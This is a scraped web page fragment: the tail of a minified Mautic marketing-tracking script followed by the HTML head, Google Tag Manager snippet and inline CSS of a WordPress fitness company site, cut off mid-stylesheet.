e=events.facebook_pixel;for(var i=0;i<e.length;i++){if(typeof e[i]['action']!=='undefined'&&typeof e[i]['label']!=='undefined') fbq('trackCustom',e[i]['action'],{eventLabel:e[i]['label']});}} if(typeof ga!=='undefined'&&typeof events.google_analytics!=='undefined'){var e=events.google_analytics;for(var i=0;i<e.length;i++){if(typeof e[i]['action']!=='undefined'&&typeof e[i]['label']!=='undefined') ga('send',{hitType:'event',eventCategory:e[i]['category'],eventAction:e[i]['action'],eventLabel:e[i]['label'],});}} if(typeof events.focus_item!=='undefined'){console.log(events);var e=events.focus_item;for(var i=0;i<e.length;i++){if(typeof e[i]['id']!=='undefined'&&typeof e[i]['js']!=='undefined'){MauticJS.insertScript(e[i]['js']);}}}};(function(m,l,n,d){m.pageTrackingUrl=(l.protocol=='https:'?'https:':'https:')+'//ariticpinpoint.myfitfuel.in/ma/atracking.gif';m.pageTrackingCORSUrl=(l.protocol=='https:'?'https:':'https:')+'//ariticpinpoint.myfitfuel.in/ma/mtc/event';m.contactIdUrl=(l.protocol=='https:'?'https:':'https:')+'//ariticpinpoint.myfitfuel.in/ma/mtc';m.fingerprint=null;m.fingerprintComponents=null;m.fingerprintIsLoading=false;m.addFingerprint=function(params){for(var componentId in m.fingerprintComponents){var component=m.fingerprintComponents[componentId];if(typeof component.key!=='undefined'){if(component.key==='resolution'){params.resolution=component.value[0]+'x'+component.value[1];}else if(component.key==='timezone_offset'){params.timezone_offset=component.value;}else if(component.key==='navigator_platform'){params.platform=component.value;}else if(component.key==='adblock'){params.adblock=component.value;}else if(component.key==='do_not_track'){params.do_not_track=component.value;}}} params.fingerprint=m.fingerprint;return params;} m.deliverPageEvent=function(event,params){if(!m.firstDeliveryMade&&params['counter']>0){setTimeout(function(){m.deliverPageEvent(event,params);},5);return;} if(m.fingerprintComponents){params=m.addFingerprint(params);} if(m.preEventDeliveryQueue.length&&m.beforeFirstDeliveryMade===false){for(var i=0;i<m.preEventDeliveryQueue.length;i++){m.preEventDeliveryQueue[i](params);} params=m.appendTrackedContact(params);m.beforeFirstDeliveryMade=true;} MauticJS.makeCORSRequest('POST',m.pageTrackingCORSUrl,params,function(response){MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':event,'params':params,'response':response});},function(){m.buildTrackingImage(event,params);m.firstDeliveryMade=true;});} m.buildTrackingImage=function(pageview,params){delete m.trackingPixel;m.trackingPixel=new Image();if(typeof pageview[3]==='object'){var events=['onabort','onerror','onload'];for(var i=0;i<events.length;i++){var e=events[i];if(typeof pageview[3][e]==='function'){m.trackingPixel[e]=pageview[3][e];}}} m.trackingPixel.onload=function(e){MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':pageview,'params':params,'image':true});};m.trackingPixel.src=m.pageTrackingUrl+'?'+m.serialize(params);} m.pageViewCounter=0;m.sendPageview=function(pageview){var queue=[];if(!pageview){if(typeof m.getInput==='function'){queue=m.getInput('send','pageview');}else{return false;}}else{queue.push(pageview);} if(queue){for(var i=0;i<queue.length;i++){var event=queue[i];var params={page_title:d.title,page_language:n.language,page_referrer:(d.referrer)?d.referrer.split('/')[2]:'',page_url:l.href,counter:m.pageViewCounter};params=MauticJS.appendTrackedContact(params);if(typeof event[2]==='object'){for(var attr in event[2]){params[attr]=event[2][attr];}} m.handleFingerprintInit(event,params);m.pageViewCounter++;}}} m.handleFingerprintInit=function(event,params){if(m.fingerprintComponents){m.deliverPageEvent(event,params);}else if(!m.fingerprint&&m.fingerprintIsLoading===false){m.fingerprintIsLoading=true;new Fingerprint2().get(function(result,components){m.fingerprintIsLoading=false;m.fingerprint=result;m.fingerprintComponents=components;m.deliverPageEvent(event,params);});}else if(m.fingerprintIsLoading===true){var fingerprintLoop=window.setInterval(function(){if(m.fingerprintIsLoading===false){m.deliverPageEvent(event,params);clearInterval(fingerprintLoop);}},5);}else{m.deliverPageEvent(event,params);}} m.sendPageview();document.addEventListener('eventAddedToMauticQueue',function(e){m.sendPageview(e.detail);});})(MauticJS,location,navigator,document);if(typeof MauticDomain=='undefined'){var MauticDomain='https://ariticpinpoint.myfitfuel.in';} if(typeof MauticLang=='undefined'){var MauticLang={'submittingMessage':"Please wait..."};} MauticJS.replaceDynamicContent=function(params){params=params||{};var dynamicContentSlots=document.querySelectorAll('.mautic-slot, [data-slot="dwc"]');if(dynamicContentSlots.length){MauticJS.iterateCollection(dynamicContentSlots)(function(node,i){var slotName=node.dataset['slotName'];if('undefined'===typeof slotName){slotName=node.dataset['paramSlotName'];} if('undefined'===typeof slotName){node.innerHTML='';return;} var url='https://ariticpinpoint.myfitfuel.in/ma/dwc/slotNamePlaceholder'.replace('slotNamePlaceholder',slotName);MauticJS.makeCORSRequest('GET',url,params,function(response,xhr){if(response.content){var dwcContent=response.content;node.innerHTML=dwcContent;if(response.id&&response.sid){MauticJS.setTrackedContact(response);} if(dwcContent.search("mauticform_wrapper")>0){if(typeof MauticSDK=='undefined'){MauticJS.insertScript('https://ariticpinpoint.myfitfuel.in/ma/media/js/mautic-form.js');var fileInterval=setInterval(function(){if(typeof MauticSDK!='undefined'){MauticSDK.onLoad();clearInterval(fileInterval);}},100);}else{MauticSDK.onLoad();}} var m;var regEx=/<script[^>]+src="?([^"\s]+)"?\s/g;while(m=regEx.exec(dwcContent)){if((m[1]).search("/focus/")>0){MauticJS.insertScript(m[1]);}} if(dwcContent.search("fr-gatedvideo")>0){MauticJS.initGatedVideo();}}});});}};MauticJS.beforeFirstEventDelivery(MauticJS.replaceDynamicContent);
0
<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <script> dataLayer = []; </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-TNLZ6XJ');</script> <!-- End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <meta name="google-site-verification" content="vCZaOnsYQhNOracRGCXezM9sHlyhV0D4YPuieY6CDqE" /> <style type="text/css" media="all">img.wp-smiley,img.emoji{display:inline !important;border:0 !important;box-shadow:none !important;height:1em !important;width:1em !important;margin:0 .07em !important;vertical-align:-.1em !important;background:none !important;padding:0 !important} #sb_instagram,#sb_instagram.sbi_fixed_height{-webkit-box-sizing:border-box;-moz-box-sizing:border-box}#sb_instagram{width:100%;margin:0 auto;padding:0;box-sizing:border-box}#sb_instagram:after{content:"";display:table;clear:both}#sb_instagram.sbi_fixed_height{overflow:hidden;overflow-y:auto;box-sizing:border-box}#sb_instagram #sbi_images{width:100%;float:left;line-height:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}#sb_instagram #sbi_images .sbi_item{display:-moz-inline-stack;display:inline-block;vertical-align:top;zoom:1;max-height:1000px;padding:inherit!important;margin:0!important;text-decoration:none;opacity:1;overflow:hidden;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;-webkit-transition:all .5s ease;-moz-transition:all .5s ease;-o-transition:all .5s ease;-ms-transition:all .5s ease;transition:all .5s ease}#sb_instagram #sbi_images .sbi_item.sbi_transition{opacity:0;max-height:0}#sb_instagram.sbi_col_1 #sbi_images .sbi_item{width:100%}#sb_instagram.sbi_col_2 #sbi_images .sbi_item{width:50%}#sb_instagram.sbi_col_3 #sbi_images .sbi_item{width:33.33%}#sb_instagram.sbi_col_4 #sbi_images .sbi_item{width:25%}#sb_instagram.sbi_col_5 #sbi_images .sbi_item{width:20%}#sb_instagram.sbi_col_6 #sbi_images .sbi_item{width:16.66%}#sb_instagram.sbi_col_7 #sbi_images .sbi_item{width:14.28%}#sb_instagram.sbi_col_8 #sbi_images .sbi_item{width:12.5%}#sb_instagram.sbi_col_9 #sbi_images .sbi_item{width:11.11%}#sb_instagram.sbi_col_10 #sbi_images .sbi_item{width:10%}#sb_instagram.sbi_col_1.sbi_disable_mobile #sbi_images .sbi_item{width:100%}#sb_instagram.sbi_col_2.sbi_disable_mobile #sbi_images .sbi_item{width:50%}#sb_instagram.sbi_col_3.sbi_disable_mobile #sbi_images .sbi_item{width:33.33%}#sb_instagram.sbi_col_4.sbi_disable_mobile #sbi_images .sbi_item{width:25%}#sb_instagram.sbi_col_5.sbi_disable_mobile #sbi_images .sbi_item{width:20%}#sb_instagram.sbi_col_6.sbi_disable_mobile #sbi_images .sbi_item{width:16.66%}#sb_instagram.sbi_col_7.sbi_disable_mobile #sbi_images .sbi_item{width:14.28%}#sb_instagram.sbi_col_8.sbi_disable_mobile #sbi_images .sbi_item{width:12.5%}#sb_instagram.sbi_col_9.sbi_disable_mobile #sbi_images .sbi_item{width:11.11%}#sb_instagram.sbi_col_10.sbi_disable_mobile #sbi_images .sbi_item{width:10%}#sb_instagram .sbi_photo_wrap{position:relative}#sb_instagram .sbi_photo{display:block;text-decoration:none}#sb_instagram .sbi_photo img{width:100%;height:auto}#sb_instagram a,#sb_instagram a:active,#sb_instagram a:focus,#sb_instagram a:hover{outline:0}#sb_instagram img{display:block;padding:0!important;margin:0!important;max-width:100%!important;opacity:1!important}#sb_instagram .sbi_link{display:none;position:absolute;bottom:0;right:0;width:100%;padding:10px 0;background:rgba(0,0,0,.5);text-align:center;color:#fff;font-size:12px;line-height:1.1}#sb_instagram .sbi_link a{padding:0 6px;text-decoration:none;color:#fff;font-size:12px;line-height:1.1;display:-moz-inline-stack;display:inline-block;vertical-align:top;zoom:1}#sb_instagram .sbi_link .sbi_lightbox_link{padding-bottom:5px}#sb_instagram .sbi_link a:focus,#sb_instagram .sbi_link a:hover{text-decoration:underline}#sb_instagram .sbi_photo_wrap:focus .sbi_link,#sb_instagram .sbi_photo_wrap:hover .sbi_link{display:block}#sb_instagram svg:not(:root).svg-inline--fa{height:1em}#sb_instagram .sbi_type_carousel .sbi_playbtn,#sb_instagram .sbi_type_carousel .svg-inline--fa.fa-play,#sb_instagram .sbi_type_video .sbi_playbtn,#sb_instagram .sbi_type_video .svg-inline--fa.fa-play,.sbi_type_carousel .fa-clone{display:block!important;position:absolute;z-index:1;color:#fff;color:rgba(255,255,255,.9);font-style:normal!important;text-shadow:0 0 8px rgba(0,0,0,.8)}#sb_instagram .sbi_type_carousel .sbi_playbtn,#sb_instagram .sbi_type_video .sbi_playbtn{z-index:2;top:50%;left:50%;margin-top:-24px;margin-left:-19px;padding:0;font-size:48px}#sb_instagram .sbi_type_carousel .fa-clone{right:12px;top:12px;font-size:24px;text-shadow:0 0 8px rgba(0,0,0,.3)}#sb_instagram .sbi_type_carousel .svg-inline--fa.fa-play,#sb_instagram .sbi_type_video .svg-inline--fa.fa-play,.sbi_type_carousel svg.fa-clone{-webkit-filter:drop-shadow( 0 0 2px rgba(0,0,0,.4) );filter:drop-shadow( 0 0 2px rgba(0, 0, 0, .4) )}#sb_instagram .sbi_loader{width:20px;height:20px;position:relative;top:50%;left:50%;margin:-10px 0 0 -10px;background-color:#000;background-color:rgba(0,0,0,.5);border-radius:100%;-webkit-animation:sbi-sk-scaleout 1s infinite ease-in-out;animation:sbi-sk-scaleout 1s infinite ease-in-out}#sb_instagram #sbi_load .sbi_loader{position:absolute;margin-top:-11px;background-color:#fff;opacity:1}@-webkit-keyframes sbi-sk-scaleout{0%{-webkit-transform:scale(0)}100%{-webkit-transform:scale(1);opacity:0}}@keyframes sbi-sk-scaleout{0%{-webkit-transform:scale(0);-ms-transform:scale(0);transform:scale(0)}100%{-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1);opacity:0}}#sb_instagram .fa-spin,#sbi_lightbox .fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}#sb_instagram .fa-pulse,#sbi_lightbox .fa-pulse{-webkit-animation:fa-spin 1s infinite steps(8);animation:fa-spin 1s infinite steps(8)}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}#sb_instagram .sb_instagram_header{float:left;clear:both;margin:0 0 15px;padding:0;line-height:1.2;width:100%}#sb_instagram .sb_instagram_header a{float:left;display:block;min-width:100%\9;transition:color .5s ease;text-decoration:none}@media all and (min-width:480px){#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_img,#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_img img{width:80px;height:80px;border-radius:40px}#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_text h3{font-size:20px}#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_text .sbi_bio,#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_text .sbi_bio_info{font-size:14px}#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_text .sbi_bio,#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_text .sbi_bio_info,#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_text h3{margin-left:95px!important;line-height:1.4}#sb_instagram .sbi_medium .sbi_header_text h3{margin-right:-85px!important}#sb_instagram .sb_instagram_header.sbi_medium .sbi_header_text .sbi_bio_info{margin-top:4px!important}#sb_instagram .sbi_medium .sbi_header_text.sbi_no_info h3{padding-top:20px!important}#sb_instagram .sb_instagram_header.sbi_large .sbi_header_img,#sb_instagram .sb_instagram_header.sbi_large .sbi_header_img img{width:120px;height:120px;border-radius:60px}#sb_instagram .sb_instagram_header.sbi_large .sbi_header_text h3{font-size:28px}#sb_instagram .sb_instagram_header.sbi_large .sbi_header_text .sbi_bio,#sb_instagram .sb_instagram_header.sbi_large .sbi_header_text .sbi_bio_info{font-size:16px}#sb_instagram .sb_instagram_header.sbi_large .sbi_header_text .sbi_bio,#sb_instagram .sb_instagram_header.sbi_large .sbi_header_text .sbi_bio_info,#sb_instagram .sb_instagram_header.sbi_large .sbi_header_text h3{margin-left:140px!important;line-height:1.5}#sb_instagram .sbi_large .sbi_header_text h3{margin-right:-120px!important}#sb_instagram .sb_instagram_header.sbi_large .sbi_header_text .sbi_bio_info{margin-top:12px!important}#sb_instagram .sbi_large .sbi_header_text.sbi_no_info h3{padding-top:32px!important}}#sb_instagram .sbi_header_img{float:left;position:relative;width:50px;margin:0 0 0 -100%!important;overflow:hidden;-moz-border-radius:40px;-webkit-border-radius:40px;border-radius:40px}#sb_instagram .sbi_header_img img{float:left;margin:0!important;padding:0!important;border:none!important;-moz-border-radius:40px;-webkit-border-radius:40px;border-radius:40px}#sb_instagram .sbi_header_img_hover i{position:absolute;top:50%;left:50%;margin-top:-12px;margin-left:-12px;width:24px;height:24px;overflow:hidden;background:url(//evolvefitnessinc.com/wp/wp-content/plugins/instagram-feed/css/../img/small-logo.png) no-repeat}#sb_instagram .sb_instagram_header .sbi_fade_in{opacity:1;transition:opacity .2s ease-in-out}#sb_instagram .sbi_header_img_hover{position:absolute;width:100%;top:0;bottom:0;left:0;text-align:center;color:#fff;background:rgba(0,0,0,.75);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter:alpha(opacity=0);-moz-opacity:0;-khtml-opacity:0;opacity:0;border-radius:40px;transition:opacity .2s}#sb_instagram .sb_instagram_header a:focus .sbi_header_img_hover,#sb_instagram .sb_instagram_header a:hover .sbi_header_img_hover{opacity:1}#sb_instagram .sbi_header_text{float:left;width:100%;padding-top:5px}#sb_instagram .sbi_header_text .sbi_bio,#sb_instagram .sbi_header_text h3{float:left;clear:both;width:auto;margin:0 0 0 60px!important;padding:0!important}#sb_instagram #sbi_load,#sb_instagram .sb_instagram_error{width:100%;text-align:center;line-height:1.5}#sb_instagram .sb_instagram_header h3{font-size:16px;line-height:1.3}#sb_instagram .sb_instagram_header p{font-size:13px;line-height:1.3}#sb_instagram .sb_instagram_header h3.sbi_no_bio{padding-top:9px!important}#sb_instagram .sbi_header_text img.emoji{margin-right:3px!important}#sb_instagram #sbi_load{float:left;clear:both;opacity:1;transition:all .5s ease-in}#sb_instagram #sbi_load .fa-spinner{display:none;position:absolute;top:50%;left:50%;margin:-8px 0 0 -7px;font-size:15px}#sb_instagram .sbi_load_btn .sbi_btn_text,#sb_instagram .sbi_load_btn .sbi_loader{opacity:1;transition:all .1s ease-in}#sb_instagram .sbi_hidden{opacity:0!important}#sb_instagram #sbi_load .sbi_load_btn,#sb_instagram .sbi_follow_btn a{display:-moz-inline-stack;display:inline-block;vertical-align:top;zoom:1;padding:7px 14px;margin:5px auto 0;background:#333;border:none;color:#fff;text-decoration:none;font-size:13px;line-height:1.5;-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;transition:all .1s ease-in}#sb_instagram #sbi_load .sbi_load_btn{position:relative}#sb_instagram .sbi_follow_btn{display:-moz-inline-stack;display:inline-block;vertical-align:top;zoom:1;text-align:center}#sb_instagram .sbi_follow_btn.sbi_top{display:block;margin-bottom:5px}#sb_instagram .sbi_follow_btn a{background:#408bd1;color:#fff}#sb_instagram #sbi_load .sbi_load_btn:hover{outline:0;box-shadow:inset 0 0 20px 20px rgba(255,255,255,.25)}#sb_instagram .sbi_follow_btn a:focus,#sb_instagram .sbi_follow_btn a:hover{outline:0;box-shadow:inset 0 0 10px 20px #359dff}#sb_instagram #sbi_load .sbi_load_btn.sbi_custom:hover,#sb_instagram .sbi_follow_btn.sbi_custom a:focus,#sb_instagram .sbi_follow_btn.sbi_custom a:hover{box-shadow:inset 0 0 20px 20px rgba(255,255,255,.15)}#sb_instagram #sbi_load .sbi_load_btn:active,#sb_instagram .sbi_follow_btn a:active{box-shadow:inset 0 0 10px 20px rgba(0,0,0,.3)}#sb_instagram .sbi_follow_btn .fa,#sb_instagram .sbi_follow_btn svg{margin-bottom:-1px;margin-right:7px;font-size:15px}#sb_instagram .sbi_follow_btn svg{vertical-align:-.125em}#sb_instagram #sbi_load .sbi_follow_btn{margin-left:5px}#sbi_mod_error{display:none;border:1px solid #ddd;background:#eee;color:#333;margin:0;padding:10px 15px;font-size:13px;text-align:center;-moz-border-radius:4px;-webkit-border-radius:4px;border-radius:4px}#sbi_mod_error p{padding:5px 0!important;margin:0!important;line-height:1.3!important}#sbi_mod_error ol,#sbi_mod_error ul{padding:5px 0 5px 20px!important;margin:0!important}#sbi_mod_error li{padding:1px 0!important;margin:0!important}#sbi_mod_error span{font-size:12px}#sb_instagram.sbi_medium .sbi_photo_wrap .svg-inline--fa.fa-play,#sb_instagram.sbi_medium .sbi_playbtn{margin-top:-12px;margin-left:-9px;font-size:23px}#sb_instagram.sbi_medium .sbi_type_carousel .sbi_photo_wrap .fa-clone{right:8px;top:8px;font-size:18px}#sb_instagram.sbi_small .sbi_photo_wrap .svg-inline--fa.fa-play,#sb_instagram.sbi_small .sbi_playbtn{margin-top:-9px;margin-left:-7px;font-size:18px}#sb_instagram.sbi_small .sbi_type_carousel .sbi_photo_wrap .fa-clone{right:5px;top:5px;font-size:12px}@media all and (max-width:640px){#sb_instagram.sbi_col_3 #sbi_images .sbi_item,#sb_instagram.sbi_col_4 #sbi_images .sbi_item,#sb_instagram.sbi_col_5 #sbi_images .sbi_item,#sb_instagram.sbi_col_6 #sbi_images .sbi_item{width:50%}#sb_instagram.sbi_col_10 #sbi_images .sbi_item,#sb_instagram.sbi_col_7 #sbi_images .sbi_item,#sb_instagram.sbi_col_8 #sbi_images .sbi_item,#sb_instagram.sbi_col_9 #sbi_images .sbi_item{width:25%}#sb_instagram.sbi_width_resp{width:100%!important}}@media all and (max-width:480px){#sb_instagram.sbi_col_10 #sbi_images .sbi_item,#sb_instagram.sbi_col_3 #sbi_images .sbi_item,#sb_instagram.sbi_col_4 #sbi_images .sbi_item,#sb_instagram.sbi_col_5 #sbi_images .sbi_item,#sb_instagram.sbi_col_6 #sbi_images .sbi_item,#sb_instagram.sbi_col_7 #sbi_images .sbi_item,#sb_instagram.sbi_col_8 #sbi_images .sbi_item,#sb_instagram.sbi_col_9 #sbi_images .sbi_item{width:100%}} . html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td{border:0;font-family:inherit;font-size:100%;font-style:inherit;font-weight:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,nav,section{display:block}audio,canvas,video{display:inline-block;max-width:100%}html{-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body,button,input,select,textarea{color:#2b2b2b;font-family:Lato,sans-serif;font-size:16px;font-weight:400;line-height:1.5}body{background:#fff;margin:0}a{color:inherit;text-decoration:none}a:focus{outline:thin dotted}a:hover,a:active{outline:0}a:active,a:hover{color:inherit}h1,h2,h3,h4,h5,h6{clear:both;font-weight:700;margin:36px 0 12px}h1{font-size:26px;line-height:1.3846153846}h1.first-title{margin-top:0;line-height:1}h2{font-size:24px;line-height:1}h3{font-size:22px;line-height:1.0909090909}h4{font-size:20px;line-height:1.2}h5{font-size:18px;line-height:1.3333333333}h6{font-size:16px;line-height:1.5}address{font-style:italic;margin-bottom:24px}abbr[title]{border-bottom:1px dotted #2b2b2b;cursor:help}b,strong{font-weight:700}cite,dfn,em,i{font-style:italic}mark,ins{background:#fff9c0;text-decoration:none}p{margin-bottom:24px}code,kbd,tt,var,samp,pre{font-family:monospace,serif;font-size:15px;-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none;line-height:1.6}pre{border:1px solid rgba(0,0,0,.1);-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;margin-bottom:24px;max-width:100%;overflow:auto;padding:12px;white-space:pre;white-space:pre-wrap;word-wrap:break-word}blockquote,q{-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none;quotes:none}blockquote:before,blockquote:after,q:before,q:after{content:"";content:none}blockquote{color:#767676;font-size:19px;font-style:italic;font-weight:300;line-height:1.2631578947;margin-bottom:24px}blockquote cite,blockquote small{color:#2b2b2b;font-size:16px;font-weight:400;line-height:1.5}blockquote em,blockquote i,blockquote cite{font-style:normal}blockquote strong,blockquote b{font-weight:400}small{font-size:smaller}big{font-size:125%}sup,sub{font-size:75%;height:0;line-height:0;position:relative;vertical-align:baseline}sup{bottom:1ex}sub{top:.5ex}dl{margin-bottom:24px}dt{font-weight:bold}dd{margin-bottom:24px}ul,ol{list-style:none;margin:0 0 24px 20px}ul{list-style:disc}ol{list-style:decimal}li>ul,li>ol{margin:0 0 0 20px}img{-ms-interpolation-mode:bicubic;border:0;vertical-align:middle}figure{margin:0}fieldset{border:1px solid rgba(0,0,0,.1);margin:0 0 24px;padding:11px 12px 0}legend{white-space:normal}button,input,select,textarea{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;font-size:100%;margin:0;max-width:100%;vertical-align:baseline}button,input{line-height:normal}input,textarea{background-image:-webkit-linear-gradient(hsla(0,0%,100%,0),hsla(0,0%,100%,0))}button,html input[type="button"],input[type="reset"],input[type="submit"]{-webkit-appearance:button;cursor:pointer}button[disabled],input[disabled]{cursor:default}input[type="checkbox"],input[type="radio"]{padding:0}input[type="search"]{-webkit-appearance:textfield}input[type="search"]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}textarea{overflow:auto;vertical-align:top}table,th,td{border:1px solid rgba(0,0,0,.1)}table{border-collapse:separate;border-spacing:0;border-width:1px 0 0 1px;margin-bottom:24px;width:100%}caption,th,td{font-weight:normal;text-align:left}th{border-width:0 1px 1px 0;font-weight:bold}td{border-width:0 1px 1px 0}del{color:#767676}hr{background-color:rgba(0,0,0,.1);border:0;height:1px;margin-bottom:23px}::selection{background:#666;color:#fff;text-shadow:none}::-moz-selection{background:#666;color:#fff;text-shadow:none}.contentWrapper{max-width:970px;position:relative;margin:0 auto;padding:0 115px}.darkBlue{color:#435363 !important}.lightBlue,.blue{color:#00a4e4 !important}.red{color:#ef4129 !important}.orange{color:#f89728}.darkBlueBg{background-color:#435363}.lightBlueBg{background-color:#00a4e4}body{font-family:"Open Sans",sans-serif}h1{font-size:37px;font-weight:600;text-transform:uppercase;font-family:"Open Sans",sans-serif;color:#f89728;line-height:41px;margin-bottom:10px}.subtitle{color:#00a4e4;font-size:19px;text-transform:uppercase;margin-bottom:30px;display:block}.subtitle.orange{color:#f89728}p{font-size:17px;color:#435363;margin:0 0 10px;line-height:24px;font-family:"Myriad Pro",sans-serif}img{max-width:100%;max-height:100%;width:auto;height:auto}.col3{display:inline-block;width:32%;margin-right:2%;margin-left:-4px;vertical-align:top}.col3last,.col3:last-child{margin-right:0}.col3 img{display:block;text-align:center;margin:0 auto;margin-bottom:15px}.vidLink .vid{padding-top:175px;width:200px;background-image:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/play_movie.png);background-position:top center;background-repeat:no-repeat;opacity:1;font-size:18px;color:#f89728;text-transform:uppercase;display:inline-block;vertical-align:top;text-align:center}.vidLink .vid:hover{opacity:.7;cursor:pointer}.btn{font-size:24px;color:#fff;background-color:#f89728;line-height:30px;padding:10px 30px;display:block}.btn:hover{opacity:.7;color:#fff;cursor:pointer}.evPost.team-members .evPostImg{float:left;margin:0 20px 20px 0}.evPost.team-members .subtitle{margin-bottom:10px}.evPost.team-members .evPostContent{margin-left:120px;max-width:600px}.evPost.team-members .evPostContent p{font-size:16px;float:left}.evPost.team-members a{display:block;text-align:right;color:#00a4e4;clear:both}.evMediaContainer{margin-left:15px;margin-bottom:15px}.evPost.evolve-media{border:15px solid #fff;display:inline-block;width:300px;vertical-align:top;height:200px;text-align:center;background-color:#fff;margin-left:-15px;margin-bottom:-15px}.evPost.evolve-media .evPostImg{width:100%;height:100%}.evPost.evolve-media .evPostImg img{width:100%}.evPost.evolve-media .evPostContent{display:none}header{position:fixed;z-index:99;left:0;right:0;background-color:#fff;border-bottom:1px solid #d7d8d9}#logo{margin-left:15px;line-height:82px}#navRight{position:absolute;right:0;top:0}#navRight>div{display:inline-block;vertical-align:middle}#nav{margin:15px 10px;font-family:"Open Sans",sans-serif;font-weight:600}#nav ul{display:block;list-style:none;margin:0;padding:0;text-align:right}#nav li{display:inline-block;text-transform:uppercase;letter-spacing:-1px}#nav li a{color:inherit;font-size:inherit}#nav li:hover{color:#ef4129}#nav li#menu-item-835{color:#ef4129}#nav li#menu-item-835:hover{color:#00a4e4}#menu-top-nav li{font-size:14px;margin:0 18px}#menu-main-nav li{font-size:18px;margin:0 11px}#menu-top-nav li:last-child,#menu-main-nav li:last-child{margin-right:0}#menu-main-nav li:last-child{color:#ef4129 !important}#menu-main-nav li:last-child:hover{color:#00a4e4 !important}#navOffer{background:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/bg_so.png);background-size:cover;color:#fff;font-family:"Open Sans",sans-serif;padding:15px 40px 15px 15px;text-align:center}#navOffer p{margin:0;line-height:24px;color:#fff}#navOffer:hover p{color:#00a4e4;cursor:pointer}.oh1{font-size:20px;font-weight:100;letter-spacing:-1px}.oh2{font-size:30px;font-weight:600;letter-spacing:-1px}.mainContent,section#home{padding-top:82px}footer.contentWrapper{border-top:1px solid #d7d8d9;border-bottom:1px solid #d7d8d9;margin:50px auto;padding:30px 0}#footlogo{float:left;max-width:200px}.footerNav,#footBtm{margin-left:230px;text-align:right}#footBtm{margin-top:150px}.footerNav ul,.footerNavBtm ul{list-style:none;margin:0;padding:0;left:0;text-align:left}.footerNav li,.footerNavBtm li{display:inline-block;margin:0 15px;position:relative;font-size:13px;text-transform:uppercase}.footerNav li a,.footerNavBtm li a{text-transform:uppercase}.footerNav li ul,.footerNavBtm li ul{position:absolute;margin:0;left:0;padding:0}.footerNav li ul li,.footerNavBtm li ul li{text-transform:capitalize;margin:0;display:block}.footerNav li ul li a,.footerNavBtm li ul li a{text-transform:capitalize}.footerNavBtm{display:inline-block}#social{display:inline-block}#social a{position:relative;width:24px;height:23px;display:inline-block;vertical-align:middle}#social a span{position:absolute;top:-999px;left:-999px;text-indent:-9999px;overflow:hidden}#facebook{background-image:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/facebook.png)}#twitter{background-image:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/twitter.png)}#linkedin{background-image:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/linkedin.png)}#instagram{background-image:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/instagram.png)}#share{background-image:url(//evolvefitnessinc.com/wp/wp-content/themes/rws-evolve/images/share.png)}#slider{width:100%;overflow:hidden}#slider ul{list-style:none;margin:0;padding:0}#slider li{height:475px;list-style:none;margin:0;padding:0;float:left;background-size:cover;position:relative;background-position:top center}#slider li .contentWrapper{height:100%}#slider li p{text-shadow:0 0 10px rgba(0,0,0,.86);letter-spacing:0}.hb1{left:115px;top:100px;position:absolute;color:#fff;font-size:23px;line-height:30px;font-family:'Open 